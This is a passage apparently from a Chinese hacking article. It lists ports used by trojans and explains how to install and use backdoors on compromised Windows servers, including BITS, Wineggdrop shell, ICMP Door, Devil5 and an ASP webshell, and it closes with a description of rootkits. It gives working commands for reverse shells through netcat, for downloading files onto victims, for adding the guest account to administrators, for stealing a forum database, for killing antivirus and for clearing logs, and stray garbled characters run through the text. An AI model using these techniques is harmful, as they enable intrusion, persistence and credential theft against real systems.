服務:[NULL]
說明:木馬BOWhack開放此埠。
埠:33333
服務:[NULL]
說明:木馬Prosiak開放此埠。
埠:34324
服務:[NULL]
說明:木馬Tiny Telnet Server、BigGluck、TN開放此埠。
埠:40412
服務:[NULL]
說明:木馬The Spy開放此埠。
埠:40421、40422、40423、40426、
服務:[NULL]
說明:木馬Masters Paradise開放此埠。
埠:43210、54321
服務:[NULL]
說明:木馬SchoolBus 1.0/2.0開放此埠。
埠:44445
服務:[NULL]
說明:木馬Happypig開放此埠。
埠:50766
服務:[NULL]
說明:木馬Fore開放此埠。
埠:53001
服務:[NULL]
說明:木馬Remote Windows Shutdown開放此埠。
埠:65000
服務:[NULL]
說明:木馬Devil 1.03開放此埠。
埠:88
說明:Kerberos krb5。另外TCP的88埠也是這個用途。
埠:137
說明:SQL Named Pipes encryption over other protocols name lookup(其他協議名稱查找上的SQL命名管道加密技術)和SQL RPC encryption over other protocols name lookup(其他協議名稱查找上的SQL RPC加密技術)和Wins NetBT name service(WINS NetBT名稱服務)和Wins Proxy都用這個埠。
埠:161
說明:Simple Network Management Protocol(SMTP)(簡單網路管理協議)。
埠:162
說明:SNMP Trap(SNMP陷阱)
埠:445
說明:Common Internet File System(CIFS)(公共Internet文件系統)
埠:464
說明:Kerberos kpasswd(v5)。另外TCP的464埠也是這個用途。
埠:500
說明:Internet Key Exchange(IKE)(Internet密鑰交換)
埠:1645、1812
說明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(遠程認證撥號用戶服務)
埠:1646、1813
說明:RADIUS accounting(Routing and Remote Access)(RADIUS記帳(路由和遠程訪問))
埠:1701
說明:Layer Two Tunneling Protocol(L2TP)(第2層隧道協議)
埠:1801、3527
說明:Microsoft Message Queue Server(Microsoft消息隊列伺服器)。還有TCP的135、1801、2101、2103、2105也是同樣的用途。
埠:2504
說明:Network Load Balancing(網路平衡負荷)
⑧ 後門程序的分類
後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,採用「客戶端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能! 首先我們來簡單解釋一下什麼是典型的線程插入後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有「應用程序訪問許可權」的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是「居中家旅行、入侵攻擊」的必備品哦!
這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有埠,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門里,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)埠到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端埠功能;埠重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了「萬能密碼」的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何埠~只通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80埠都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\system32]\system32[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧? 這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。類型:網頁木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯系我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。 類型:系統後門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製埠和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,注冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!